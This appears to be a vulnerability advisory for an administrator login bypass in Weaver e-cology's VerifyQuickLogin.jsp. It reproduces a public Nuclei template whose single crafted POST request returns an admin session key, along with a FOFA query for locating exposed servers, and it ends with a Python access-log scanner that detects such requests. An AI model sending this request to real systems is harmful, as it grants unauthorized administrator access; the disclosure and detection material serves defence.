ecology-verifyquicklogin-auth-bypass: Weaver e-cology verifyquicklogin.jsp - Auth Bypass

Date: 2025-08-01 | Affected software: Weaver e-cology | PoC: public

Vulnerability description

The VerifyQuickLogin.jsp file in Weaver (Panwei) OA E-Cology contains an arbitrary administrator login vulnerability: an unauthenticated attacker who sends a crafted request to this endpoint obtains an administrator session.

PoC code [public]

id: ecology-verifyquicklogin-auth-bypass

info:
  name: Weaver e-cology verifyquicklogin.jsp - Auth Bypass
  author: SleepingBag945
  severity: high
  description: |
    There is an arbitrary administrator login vulnerability in the Panwei OA E-Cology VerifyQuickLogin.jsp file. An attacker can obtain the administrator Session by sending a special request package.
  reference:
    - http://wiki.peiqi.tech/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Cology%20VerifyQuickLogin.jsp%20%E4%BB%BB%E6%84%8F%E7%AE%A1%E7%90%86%E5%91%98%E7%99%BB%E5%BD%95%E6%BC%8F%E6%B4%9E.html
  classification:
    cpe: cpe:2.3:a:weaver:e-cology:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: weaver
    product: e-cology
    fofa-query: app="泛微-协同办公OA"
  tags: ecology,weaver,oa,auth-bypass,vuln

http:
  - raw:
      - |
        POST /mobile/plugin/VerifyQuickLogin.jsp HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        identifier=1&language=1&ipaddress=x.x.x.x

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "\"sessionkey\":"
          - "\"message\":"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100dfcfd1a9579e4274ca54040be141d5bca04a568f1e15fd8c65d95a98ece043ab022040757437d1e0a4bbbd138c1c6a45688abc9357d85a61234220e2aafa7a9ed059:922c64590222798bb761d5b6d8e72950
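As an added defensive example, not part of the original advisory or of the Nuclei template above, the following Python script scans web-server access logs for POST requests to the endpoint the template targets, /mobile/plugin/VerifyQuickLogin.jsp, and groups the hits by source address. The log lines are constructed samples in the common combined format; the request parameters (identifier, language, ipaddress) travel in the POST body and therefore do not appear in access logs, so a 200 response to this endpoint is treated as a likely successful session grab and anything else as an attempt worth reviewing.

```python
import re
from collections import Counter

# Endpoint taken from the Nuclei template above. Everything else here is constructed.
TARGET_PATH = "/mobile/plugin/VerifyQuickLogin.jsp"

# Combined log format: ip ident user [timestamp] "METHOD path PROTO" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample traffic (not real log data); addresses are from RFC 5737 test ranges.
SAMPLE_LOG = """\
203.0.113.5 - - [01/Aug/2025:10:00:01 +0800] "POST /mobile/plugin/VerifyQuickLogin.jsp HTTP/1.1" 200 312 "-" "python-requests/2.31"
203.0.113.5 - - [01/Aug/2025:10:00:02 +0800] "GET /wui/index.html HTTP/1.1" 200 4821 "-" "python-requests/2.31"
198.51.100.9 - - [01/Aug/2025:10:05:17 +0800] "GET /login/Login.jsp HTTP/1.1" 200 9731 "-" "Mozilla/5.0"
203.0.113.5 - - [01/Aug/2025:10:06:40 +0800] "POST /mobile/plugin/VerifyQuickLogin.jsp?x=1 HTTP/1.1" 200 298 "-" "curl/8.0"
192.0.2.77 - - [01/Aug/2025:11:12:03 +0800] "POST /mobile/plugin/verifyquicklogin.jsp HTTP/1.1" 404 153 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Parse one combined-format access log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["status"] = int(entry["status"])
    # Drop any query string so path comparison is exact.
    entry["path"] = entry["path"].split("?", 1)[0]
    return entry


def is_suspicious(entry):
    """POST to the quick-login endpoint. Compared case-insensitively so that
    case variants of the path in logs are not missed."""
    return entry["method"] == "POST" and entry["path"].lower() == TARGET_PATH.lower()


def scan(log_text):
    """Return one record per matching request; a 200 response is flagged as likely success."""
    hits = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry and is_suspicious(entry):
            hits.append({
                "ip": entry["ip"],
                "ts": entry["ts"],
                "status": entry["status"],
                "likely_success": entry["status"] == 200,
            })
    return hits


def summarize(hits):
    """Count matching requests per source address."""
    return Counter(h["ip"] for h in hits)


if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for h in found:
        print(f'{h["ts"]} {h["ip"]} status={h["status"]} likely_success={h["likely_success"]}')
    print(dict(summarize(found)))
```

Run the script against a real log by replacing SAMPLE_LOG with the file contents; any 200 response to this endpoint on an unpatched instance should be treated as a possible administrator session compromise and the sessions issued around that time reviewed.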
